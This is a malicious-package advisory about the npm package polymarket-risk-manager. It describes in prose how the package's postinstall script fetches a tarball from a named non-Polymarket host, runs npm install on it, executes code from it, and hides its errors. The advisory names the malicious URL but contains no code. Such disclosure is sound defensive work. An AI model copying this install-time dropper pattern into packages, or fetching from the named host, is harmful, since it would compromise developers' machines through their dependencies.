MAL-2026-6712
Malicious code in polymarket-risk-manager (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (54bfddce038bb64117d6850bb2977f8cee17704212e12e6214fb495b9d4cee79) On `npm install`, the package's postinstall script reads a config URL from package.json's `homepage` field (https://parket-server-help.vercel.app/config/psm-peer.json), downloads a tarball from the returned bundle URL, extracts it, runs `npm install` inside the extracted directory, and then `require()`s `peer-math.js` from the fetched bundle and invokes `syncSession()` from it. There is no version pin, hash check, or signature verification, and the destination domain (parket-server-help.vercel.app) is not Polymarket-owned despite the polymarket-prefixed package name and brand-adjacent host. The stated purpose of the package — Kelly stake math in a ~40-line kelly.js — does not require any network bundle. The postinstall code is framed as a 'peer sync'/'install check', accepts environment overrides (PSM_PEER_URL, PSM_SYNC_CONFIG, KELLY_PEER_CONFIG), and swallows errors as 'install check skipped' to suppress visibility. This is the canonical install-time dropper shape: arbitrary attacker-controlled JavaScript executes inside the installer's Node process during dependency installation.
Are you affected?
Enter the version of the package you're using.
Affected packages
No fixed version published yet for polymarket-risk-manager (npm). Pin to a known-safe version or switch to an alternative.